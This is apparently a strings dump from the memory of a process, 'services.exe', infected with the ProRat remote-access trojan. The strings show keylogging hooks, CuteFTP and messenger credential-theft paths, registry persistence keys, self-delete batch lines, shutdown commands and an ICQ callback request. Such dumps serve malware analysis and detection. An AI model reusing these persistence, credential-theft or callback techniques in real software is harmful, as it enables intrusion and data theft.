@Ftpsrv@TFtpServer@CommandDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2o
@Ftpsrv@TFtpServer@CommandLIST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMDTM$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMKD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNLST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNOOP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASS$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASV$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPORT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandQUIT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandREST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRETR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRMD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNFR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNTO$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSIZE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTRU$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSYST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandTYPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandUSER$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandXPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@DisconnectAll$qqrv
@Ftpsrv@TFtpServer@GetActive$qqrv
@Ftpsrv@TFtpServer@GetClientCount$qqrv
@Ftpsrv@TFtpServer@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@SendNextDataChunk$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocket
@Ftpsrv@TFtpServer@ServSocketSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ServSocketStateChange$qqrp14System@TObject20Wsocket@TSocketStatet2
@Ftpsrv@TFtpServer@SetActive$qqro
@Ftpsrv@TFtpServer@Start$qqrv
@Ftpsrv@TFtpServer@StartSendData$qqrp22Ftpsrvc@TFtpCtrlSocket
@Ftpsrv@TFtpServer@Stop$qqrv
@Ftpsrv@TFtpServer@TriggerAlterDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerAuthenticate$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringt2ro
@Ftpsrv@TFtpServer@TriggerBuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerChangeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerClientCommand$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@TriggerClientConnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerClientDisconnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerMakeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerRetrDataSent$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerSendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@TriggerServerStart$qqrv
@Ftpsrv@TFtpServer@TriggerServerStop$qqrv
@Ftpsrv@TFtpServer@TriggerStorDataAvailable$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketpcius
@Ftpsrv@TFtpServer@TriggerStorSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerStorSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerValidateDele$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateGet$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidatePut$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnFr$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnTo$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@WMFtpSrvAbortTransfer$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvClientClosed$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseData$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseRequest$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WndProc$qqrr17Messages@TMessage
@Ftpsrv@initialization$qqrv
@Ftpsrvc@CopyRight
@Ftpsrvc@EFtpCtrlSocketException@
@Ftpsrvc@Finalization$qqrv
@Ftpsrvc@IsUNC$qqr17System@AnsiString
@Ftpsrvc@PatchIE5$qqrr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@
@Ftpsrvc@TFtpCtrlSocket@$bctr$qqrp18Classes@TComponent
@Ftpsrvc@TFtpCtrlSocket@$bdtr$qqrv
@Ftpsrvc@TFtpCtrlSocket@Dup$qqri
@Ftpsrvc@TFtpCtrlSocket@GetPeerAddr$qqrv
@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetAbortingTransfer$qqro
@Ftpsrvc@TFtpCtrlSocket@SetDirectory$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetRcvSize$qqri
@Ftpsrvc@TFtpCtrlSocket@StartConnection$qqrv
@Ftpsrvc@TFtpCtrlSocket@TriggerCommand$qqrpci
@Ftpsrvc@TFtpCtrlSocket@TriggerDataAvailable$qqrus
@Ftpsrvc@TFtpCtrlSocket@TriggerSessionConnected$qqrus
@Ftpsrvc@initialization$qqrv
@Ftpsrvt@CopyRight
@Ftpsrvt@FileUtcStr$qqr17System@AnsiString
@Ftpsrvt@Finalization$qqrv
@Ftpsrvt@initialization$qqrv
@Smtpprot@CopyRight
@Smtpprot@Finalization$qqrv
@Smtpprot@Register$qqrv
@Smtpprot@Rfc822DateTime$qqr16System@TDateTime
@Smtpprot@SmtpException@
@Smtpprot@TCustomSmtpClient@
@Smtpprot@TCustomSmtpClient@$bctr$qqrp18Classes@TComponent
@Smtpprot@TCustomSmtpClient@$bdtr$qqrv
@Smtpprot@TCustomSmtpClient@Abort$qqrv
@Smtpprot@TCustomSmtpClient@CheckReady$qqrv
@Smtpprot@TCustomSmtpClient@ClearErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@Connect$qqrv
@Smtpprot@TCustomSmtpClient@Data$qqrv
@Smtpprot@TCustomSmtpClient@DataNext$qqrv
@Smtpprot@TCustomSmtpClient@DisplayLastResponse$qqrv
@Smtpprot@TCustomSmtpClient@DoHighLevelAsync$qqrv
@Smtpprot@TCustomSmtpClient@DoUUEncode$qqrrpvr17System@AnsiStringro
@Smtpprot@TCustomSmtpClient@EndUUEncode$qqrrpv
@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v
@Smtpprot@TCustomSmtpClient@Helo$qqrv
@Smtpprot@TCustomSmtpClient@HighLevelAsync$qqr21Smtpprot@TSmtpRequest45System@%Set$t17Smtpprot@TSmtpFct$iuc$0$iuc$8%
@Smtpprot@TCustomSmtpClient@InitUUEncode$qqrrpv17System@AnsiString
@Smtpprot@TCustomSmtpClient@Mail$qqrv
@Smtpprot@TCustomSmtpClient@MailFrom$qqrv
@Smtpprot@TCustomSmtpClient@NextExecAsync$qqrv
@Smtpprot@TCustomSmtpClient@Open$qqrv
@Smtpprot@TCustomSmtpClient@Quit$qqrv
@Smtpprot@TCustomSmtpClient@RcptTo$qqrv
@Smtpprot@TCustomSmtpClient@RcptToDone$qqrv
@Smtpprot@TCustomSmtpClient@RcptToNext$qqrv
@Smtpprot@TCustomSmtpClient@Rset$qqrv
@Smtpprot@TCustomSmtpClient@SendCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@SetContentType$qqr25Smtpprot@TSmtpContentType
@Smtpprot@TCustomSmtpClient@SetErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@SetMailMessage$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@SetRcptName$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState
@Smtpprot@TCustomSmtpClient@TriggerCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerDisplay$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerGetData$qqripciro
@Smtpprot@TCustomSmtpClient@TriggerHeaderLine$qqrpci
@Smtpprot@TCustomSmtpClient@TriggerProcessHeader$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@TriggerRequestDone$qqrus
@Smtpprot@TCustomSmtpClient@TriggerResponse$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerSessionClosed$qqrus
@Smtpprot@TCustomSmtpClient@TriggerSessionConnected$qqrus
@Smtpprot@TCustomSmtpClient@TriggerStateChange$qqrv
@Smtpprot@TCustomSmtpClient@Vrfy$qqrv
@Smtpprot@TCustomSmtpClient@WMSmtpRequestDone$qqrr17Messages@TMessage
@Smtpprot@TCustomSmtpClient@WSocketDataAvailable$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDataSent$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDnsLookupDone$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionClosed$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionConnected$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WndProc$qqrr17Messages@TMessage
@Smtpprot@TSmtpCli@
@Smtpprot@TSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSmtpCli@$bdtr$qqrv
@Smtpprot@TSmtpCli@Data$qqrv
@Smtpprot@TSmtpCli@PrepareEMail$qqrv
@Smtpprot@TSmtpCli@SetEMailFiles$qqrp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerAttachContentType$qqrir17System@AnsiStringt2
@Smtpprot@TSmtpCli@TriggerAttachHeader$qqri17System@AnsiStringp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerGetData$qqripciro
@Smtpprot@TSmtpCli@TriggerHeaderLine$qqrpci
@Smtpprot@TSyncSmtpCli@
@Smtpprot@TSyncSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSyncSmtpCli@AbortSync$qqrv
@Smtpprot@TSyncSmtpCli@ConnectSync$qqrv
@Smtpprot@TSyncSmtpCli@DataSync$qqrv
@Smtpprot@TSyncSmtpCli@HeloSync$qqrv
@Smtpprot@TSyncSmtpCli@MailFromSync$qqrv
@Smtpprot@TSyncSmtpCli@MailSync$qqrv
@Smtpprot@TSyncSmtpCli@OpenSync$qqrv
@Smtpprot@TSyncSmtpCli@QuitSync$qqrv
@Smtpprot@TSyncSmtpCli@RcptToSync$qqrv
@Smtpprot@TSyncSmtpCli@RsetSync$qqrv
@Smtpprot@TSyncSmtpCli@Synchronize$qqrynpqqrv$v
@Smtpprot@TSyncSmtpCli@VrfySync$qqrv
@Smtpprot@TSyncSmtpCli@WaitUntilReady$qqrv
@Smtpprot@initialization$qqrv
@Wsocket@TCustomSocksWSocket@SetSocksPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@GetPeerPort$qqrv
@Wsocket@TCustomWSocket@GetRemotePort$qqrv
@Wsocket@TCustomWSocket@GetXPort$qqrv
@Wsocket@TCustomWSocket@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Wsocket@TCustomWSocket@SetLocalPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@SetRemotePort$qqr17System@AnsiString
@Wsocket@WSocketResolvePort$qqr17System@AnsiStringt1
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
WindowState
CreatePipe
GetProcessHeap
WinExec
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegFlushKey
RegOpenKeyExA
RegQueryInfoKeyA
SetViewportOrgEx
ShellExecuteA
URLDownloadToFileA
ActivateKeyboardLayout
EnumThreadWindows
EnumWindows
ExitWindowsEx
GetKeyNameTextA
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardType
LoadKeyboardLayoutA
MapVirtualKeyA
MsgWaitForMultipleObjects
keybd_event
`.data
.rdata
P.idata
@.edata
@.rsrc
ADVAPI32.DLL
AVICAP32.DLL
COMCTL32.DLL
GDI32.DLL
OLE32.DLL
OLEAUT32.DLL
SHELL32.DLL
URLMON.DLL
WINMM.DLL
WINSPOOL.DRV
WS2_32.DLL
WSOCK32.DLL

services.exe_608_rwx_00401000_001FB000:

Port
LocalPort
PeerPort
SocksPort
SocksPassword
wsock32.dll
Unable to load wsock32.dll Error #
%s: WSAStartup error #%d
0.0.0.0
Cannot change Port if not closed
Cannot change LocalPort if not closed
255.255.255.255
WSocketResolveHost: Cannot convert host address '%s', Error #%d
WSocketResolvePort: Invalid Port.
WSocketResolvePort: Cannot convert port '%s', Error #%d
WSocketResolveProto: Cannot convert protocol '%s', Error #%d
GetPeerPort
%s: can't start DNS lookup, error #%d
winsock.bind failed, error #%d
winsock.getsockname failed, error #%d
Connect: No Port Specified
listen: port not assigned
Winsock.GetHostName failed
Operation would block
Operation now in progress
Operation already in progress
Socket operation on non-socket
Protocol not supported
Socket type not supported
Operation not supported on socket
Protocol family not supported
Address family not supported by protocol family
WinSock DLL cannot support this application
Can't change socks port if not closed
Listening is not supported thru socks server
tcp is the only protocol supported thru socks server
0.0.0.1
command not supported
address type not supported
TFtpString
TFtpServer (c) 1998-2000 F. Piette V1.08
FtpServerException
FtpSrv
TFtpSrvAuthenticateEvent
TFtpCtrlSocket
Password
TFtpSrvChangeDirectoryEvent
TFtpSrvBuildDirectoryEvent
TFtpSrvClientConnectEvent
TFtpSrvDataSessionConnectedEvent
TFtpSrvClientCommandEvent
Keyword
TFtpSrvAnswerToClientEvent
TFtpSrvValidateXferEvent
TFtpSrvDataAvailableEvent
TFtpSrvRetrDataSentEvent
TFtpSrvCommandProc
TFtpSrvCommandTableItem
TFtpServer
TFtpServerX
220 ICS FTP Server ready.
PORT
500 '%s': command not understood.
331 Password required for %s.
503 Login with USER first.
230 User %s logged in.
530 Login incorrect.
$530 Please login with USER and PASS.
250 CWD command successful. "%s" is current directory.
501 CWD failed. %s
257 "%s" is current directory.
200 Port command successful.
501 Invalid PORT command.
150 Opening data connection for %s.
501 Cannot STOR. %s
ftp-data
426 Connection closed; %s.
426 Connection closed; transfer aborted. Error #%d
501 Cannot RETR. %s
451 Failed: %s.
1 ftp ftp
%s %2.2d
200 Type set to %s.
500 'TYPE %s': command not understood.
250 File '%s' deleted.
450 File '%s' can't be deleted.
550 '%s': no such file or directory.
213 %d
550 Command failed: %s.
350 REST supported. Ready to resume at byte offset %d.
501 Syntax error in parameter: %s.
553 '%s': file already exists.
250 File '%s' renamed to '%s'.
450 File '%s' can't be renamed.
200 Ok. Parameter was '%s'.
550 '%s': can't create directory.
550 '%s': file or directory already exists.
257 '%s': directory created.
150 APPE supported. Ready to append file "%s" at offset %d.
200 Ok. STRU parameter '%s' ignored.
550 '%s': no such directory.
250 '%s': directory removed.
550 '%s': can't remove directory.
227 Entering Passive Mode (127,0,0,1,%d,%d).
227 Entering Passive Mode (%d,%d,%d,%d,%d,%d).
500 PASV exception: '%s'.
213 %s
550 %s
SMTP component (c) 1997-2000 F. Piette V2.17
SmtpException
SmtpProt
TSmtpState
smtpReady
smtpDnsLookup
smtpConnecting
smtpConnected
smtpInternalReady
smtpWaitingBanner
smtpWaitingResponse
smtpAbortt
TSmtpRequest
smtpConnect
smtpHelo
smtpMailFrom
smtpVrfy
smtpRcptTo
smtpData
smtpQuit
smtpRset
smtpOpen
smtpMail
smtpCustom
TSmtpFct
smtpFctNone
smtpFctHelo
smtpFctConnect
smtpFctMailFrom
smtpFctRcptTo
smtpFctData
smtpFctVrfy
smtpFctQuit
smtpFctRset
TSmtpFctSet
TSmtpContentType
smtpHTML
smtpPlainText
TSmtpDisplay
TSmtpHeaderLineEvent
TSmtpProcessHeaderEvent
TSmtpGetDataEvent
MsgLine
TSmtpRequestDone
TSmtpAttachmentContentType
TSmtpAttachHeader
TSmtpNextProc
TCustomSmtpClient
TSmtpCli
TSmtpCli4
OnProcessHeader
TSyncSmtpCli
smtp
SMTP component not ready
Uhk%D
SMTP component not connected
SMTP component already connected
426 Operation aborted.
.htPD
FtpSrvT (c) 1999-2000 F. Piette V1.02
TFtpCtrlSocket (c) 1998-2000 F. Piette V1.06
EFtpCtrlSocketException0_D
EFtpCtrlSocketException
FtpSrvC
TFtpCtrlState
ftpcInvalid
ftpcWaitingUserCode
ftpcWaitingPassword
ftpcReady
ftpcWaitingAnswer
TFtpCmdType
ftpcPORT
ftpcSTOR
ftpcRETR
ftpcCWD
ftpcXPWD
ftpcPWD
ftpcUSER
ftpcPASS
ftpcLIST
ftpcRMD
ftpcTYPE
ftpcSYST
ftpcQUIT
ftpcDELE
ftpcRNFR
ftpcMKD
ftpcRNTO
ftpcNOOP
ftpcNLST
ftpcABOR
ftpcCDUP
ftpcSIZE
ftpcREST
ftpcAPPE
ftpcSTRU
ftpcMDTM
TFtpOption
ftpcUNC
TFtpOptions
CmdBuf
CmdLen
FtpState
PassWord$
220-ICS FTP Server ready
Addressh
ssHorizontal
OnKeyDown
OnKeyPress
OnKeyUp
windows
AutoHotkeys42E
AutoHotkeysx2E
:].tJ
EInvalidGraphicOperation
KeyPreview
WindowState44E
ssHotTrack
TWindowState
poProportional
TWMKey
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
TDragOperation
TKeyEvent
TKeyPressEvent
crSQLWait
%s (%s)
IMM32.DLL
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
comctl32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
kernel32.dll
Portions Copyright (c) 1983,99 Borland
%u8F3
iphlpapi.dll
Pplugin4.dat
%s0x%1h
?Key[oku
.rd@a
KERNEL32.DLL
ADVAPI32.dll
RASAPI32.dll
SHELL32.dll
USER32.dll
.text
`.rdata
@.data
.rsrc
@.reloc
MFC42.DLL
MSVCRT.dll
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
SetWindowsHookExA
UnhookWindowsHookEx
hodll.dll
[Windows title: "%s"]
\ktd32.atm
.HookSec
.reloc
B[* ProRat - Trojan Horse - Coded by PRO Group - Made in Turkey *]
user32.dll
GetCPInfo
TESTDLL.dll
RegEnumKeyW
Advapi32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
TCP[R[P;PMP
TCMD@TG;PMP
SFTC &úWLW;PMP
CESB&%F;PMP
151.164.23.201
aku.edu.tr
atauni.edu.tr
ege.edu.tr
ankara.edu.tr
192.168.0.1
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
cuteftp
Login :
Password :
Pass :
SOFTWARE\Microsoft\Windows\CurrentVersion
%Program Files%
\GlobalSCAPE\CuteFTP\sm.dat
\GlobalSCAPE\CuteFTP\smdata.dat
\CuteFTP\tree.dat
\CuteFTP\smdata.dat
\GlobalSCAPE\CuteFTP Pro\sm.dat
\GlobalSCAPE\CuteFTP\5.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings
\RSACi.rat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\http://www.rsac.org/ratingsv01.html
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\
PRNumURLExpressions
PRBUPort
PRBUUrl
Sites.dat
Password :
Port :
Tport_atm=0
\reg_ent.reg
regedit.exe /s
\winrar.exe
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\
d_.exe
winoa386.mod
\scrpt.bat
\scrpt.vbs
\winkey.dll
\reginv.dll
127.0.0.1
.jpeg
\win.ini
\system.ini
Explorer.exe
del %c%s%c
if exist %c%s%c goto 1
del À
\system32\fservice.exe
\system\sservice.exe
\mps.atm
\kdd32.atm
\system32\winkey.dll
\system\winkey.dll
\system32\wininv.dll
\system\wininv.dll
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Explorer.exe
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag
GET /friendship/email_thank_you.php?folder_id=18984¶ms_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=
&friend_nickname2=&friend_contact2=&x=60&y=15 HTTP/1.1
Referer: http://www.icq.com/friendship/pages/send_by_email_18984.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.icq.com
Software\Microsoft\Windows\CurrentVersion\Policies\System
c:\autoexec.bat
\p_ekran.jpg
services.exe
msn.ini
yahoo.ini
Windows Ver :
Windows Language :
Windows Path :
software\microsoft\windows\currentversion
www.icq.com
Port :
Password :
Microsoft Outlook Express 6.00.2800.1158
\p_ekran.bmp
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings
Tport
Pplugin1.dll
Pplugin2.dll
Pplugin3.dll
Pplugin4.exe
Pplugin4.exe /stext
ktd32.atm
Pplugin8.exe
PpluginCd.dll
Pplugin9.dat
Pplugin8.exe /stext
Pplugin10xa.exe
Pplugin10xa.exe /stext
winp9.exe
winp9.exe /stext
eimsn.exe
winrar.exe
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
\services.exe
Windows services
Windows Logon Service
Online_List_atm=iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh
Port_atm=4001
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
shutdown.exe -s -t 00
shutdown.exe -r -t 00
shutdown.exe -l
\refresh.scf
CONTROL.EXE desk.cpl
CONTROL.EXE hdwwiz.cpl
CONTROL.EXE inetcpl.cpl
CONTROL.EXE appwiz.cpl
CONTROL.EXE intl.cpl
CONTROL.EXE joy.cpl
CONTROL.EXE access.cpl
CONTROL.EXE main.cpl
CONTROL.EXE ncpa.cpl
CONTROL.EXE nusrmgr.cpl
CONTROL.EXE timedate.cpl
CONTROL.EXE mmsys.cpl
CONTROL.EXE powercfg.cpl
CONTROL.EXE sysdm.cpl
CONTROL.EXE telephon.cpl
CONTROL.EXE odbccp32.cpl
\SOFTWARE\Microsoft\Internet Explorer\TypedURLs
////////// URL HISTORY //////////
url10
url11
url12
url13
url14
url15
url16
url17
url18
url19
url20
url21
url22
url23
url24
url25
00010pPassword Decrypt Error!
SMTP
\ICQ\Icq.exe
\Messenger\msmsgs.exe
\MSN Messenger\msnmsgr.exe
\Yahoo!\Messenger\YPager.exe
\Outlook Express\msimn.exe
\GlobalSCAPE\CuteFTP\cutftp32.exe
\NetMeeting\conf.exe
notepad.exe
mspaint.exe
wordpad.exe
calc.exe
\WinZip\WINZIP32.EXE
\WinRAR\WinRAR.exe
cmd.exe
command.com
\Internet Explorer\IEXPLORE.EXE
wmplayer.exe
\Winamp\winamp.exe
\Real\RealOne Player\realplay.exe
\QuickTime\QuickTimePlayer.exe
\Movie Maker\moviemk.exe
\FlashGet\flashget.exe
_ReadCdKeys
&serverportu=
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
[email protected]
FtpServer1
FtpServer2
SmtpCli1
FtpServer1Authenticate
FtpServer2Authenticate
FormKeyDown
SmtpCli1RequestDone
FtpServer1ChangeDirectory
Memo2KeyDown
xxtype.cpp
derv->tpClass.tpcFlags & CF_HAS_BASES
Inappropriate I/O control operation
Broken pipe
Operation not permitted
%H:%M:%S
%m/%d/%y
%A, %B %d, %Y
d/d/d d:d:d.d
xx.cpp
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcDtorAddr
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
memType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
elemType->tpClass.tpcFlags & CF_HAS_DTOR
%WinDir%\
Project1.exe
@$xp$16Ftpsrv@FtpSrv__3
@$xp$17Ftpsrv@TFtpServer
@$xp$17Ftpsrv@TFtpString
@$xp$17Smtpprot@TSmtpCli
@$xp$17Smtpprot@TSmtpFct
@$xp$18Ftpsrvc@TFtpOption
@$xp$19Ftpsrvc@TFtpCmdType
@$xp$19Ftpsrvc@TFtpOptions
@$xp$19Smtpprot@TSmtpState
@$xp$20Smtpprot@TSmtpFctSet
@$xp$21Ftpsrvc@TCommandEvent
@$xp$21Ftpsrvc@TDisplayEvent
@$xp$21Ftpsrvc@TFtpCtrlState
@$xp$21Smtpprot@TSmtpDisplay
@$xp$21Smtpprot@TSmtpRequest
@$xp$21Smtpprot@TSyncSmtpCli
@$xp$22Ftpsrvc@TFtpCtrlSocket
@$xp$22Smtpprot@SmtpException
@$xp$22Smtpprot@TSmtpNextProc
@$xp$25Ftpsrv@FtpServerException
@$xp$25Ftpsrv@TFtpSrvCommandProc
@$xp$25Smtpprot@TSmtpContentType
@$xp$25Smtpprot@TSmtpRequestDone
@$xp$26Ftpsrv@TFtpCtrlSocketClass
